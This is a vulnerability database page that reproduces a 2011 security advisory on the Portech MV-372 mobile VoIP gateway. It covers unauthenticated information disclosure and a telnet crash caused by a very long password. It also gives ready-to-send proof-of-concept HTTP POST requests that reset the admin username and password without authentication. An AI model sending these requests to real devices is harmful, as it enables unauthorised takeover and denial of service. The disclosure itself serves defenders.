Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Portech MV-372 Denial Of Service / Bypass

🗓️ 04 Jul 2011 00:00:00Reported by Zsolt ImreType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 41 Views

Portech MV-372 Mobile VoIP Gateway Multiple Vulnerabilitie

Code
`Portech MV-372 Mobile VoIP Multiple Vulnerabilities  
  
1. Description  
  
Multiple vulnerabilities have been found in Portech MV-372 Mobile VoIP  
Gateway which allows an attacker to compromise the device and/or initiate a  
denial of service attack against it’s telnet service.  
The ’Device details’ section contains information about the affected system.  
Previous and future versions might be also vulnerable (not tested).  
  
The vendor has been notified and aware of the issue but from their reply it  
seems we will have to wait for a hotfix/patch for a while.  
  
2. Device details  
  
Mobile VoIP2 v9.092  
  
Model Type: MV-372  
Module Description: GSM:850/900/1800/1900MHz (SIM3x0)  
Firmware Version: Mon Sep 6 13:11:30 2010.  
Codec Version: Fri Mar 20 17:13:45 2009.  
Contact Address: 150, Shiang-Shung N.Road., Taichung, Taiwan, R.O.C.  
Tel: 886-4-23058000  
Fax: 886-4-23022596  
E-Mail: [email protected]  
Web Site: http://www.portech.com.tw.  
  
3. Information disclosure  
  
It is possible to access http://<device address>/info.htm without  
authentication. This page reveals information about the device like model  
type, module description, firmware and codec versions.  
  
4. Telnet service remote denial of service vulneraility  
  
It is possible to initiate a denial service attack against the telnet  
service without authentication by providing a very long password (e.g.: >  
5000 chars) at authentication. No valid username required.  
As a result of the attack the telnet service crashes and will be unavailable  
until the device is restarted.  
  
5. Web Administration authentication bypass vulnerability  
  
5.1 Description  
  
An authetication bypass vulnerability exists in the web interface which  
allows an attacker to modify the configuration of the device without  
providing a valid username and password.  
After a successful authentication we can see that our browser got no  
cookie(s) from the device. After restarting the browser, deleting all stored  
information or using private browsing we can still access the administrative  
pages. When we change our IP address these pages are no longer accessible  
and we are asked to log in. So, the device stores our IP address and uses it  
as a session identifier. However this is a weakness, just like that the  
application uses http protocol instead of https for authentication it also  
fails to properly validate the user session.  
The files with ’.htm’ extension are responsible for user interaction and  
displaying configuration settings and the application is using CGI to handle  
requested tasks like configuration-, username and password changes.  
While the ’.htm’ pages verify our IP address, the CGI files not so calling  
these files directly with the proper arguments will result in the execution  
of the requested action without any authentication.  
  
5.2 Proof of concept  
  
To change the username and password of the device without authentication  
send the following query to the device:  
  
POST http://<device address>/change.cgi HTTP/1.1  
Host: <device address>  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101  
Firefox/5.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7  
Connection: keep-alive  
Referer: http://192.168.0.100/change.htm  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 50  
  
Nuser=admin&Npass=admin&Nrpass=admin&submit=Submit  
  
The query above will change the actual username and password both to admin.  
To apply the changes we have to save our configuration which can be done  
with the query below. After executing the query the device restarts and we  
can log in with the username ’admin’ and password ’admin’.  
  
POST http://<device address>/save.cgi  
Host: <device address>  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101  
Firefox/5.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7  
Connection: keep-alive  
Referer: http://192.168.0.100/save.htm  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 11  
  
submit=Save  
  
All other CGIs are also vulnerable.  
  
  
Regards,  
Zsolt Imre  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Jul 2011 00:00Current
denial of servicebypasstelnetauthenticationvulnerabilityweb administrationinfo disclosurehotfixpatchportech mv-372voip gateway
41